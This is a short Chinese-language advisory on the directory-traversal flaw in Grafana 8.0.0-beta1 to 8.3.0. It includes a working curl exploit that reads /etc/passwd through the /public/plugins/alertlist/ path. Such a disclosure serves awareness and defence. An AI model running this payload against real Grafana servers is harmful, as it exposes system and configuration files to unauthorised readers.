受影响版本:Grafana 8.0.0-beta1 至 8.3.0(已修补版本除外)
漏洞类型:目录遍历(Directory Traversal)
影响程度:严重(Critical)
平台:Grafana(开源监控与可观测性平台)
⚠️ 漏洞详情 在 Grafana 中,可通过以下 URL 实施目录遍历:
Code http://<grafana_host>/public/plugins//
攻击者可借此读取服务器上的本地文件。例如,未经授权访问 /etc/passwd 或配置文件。
🔥 利用示例 通过一个简单的请求读取文件:
bash curl http://target:3000/public/plugins/alertlist/../../../../../../../../etc/passwd
通过上述请求,即可获取 Linux 系统中的用户列表。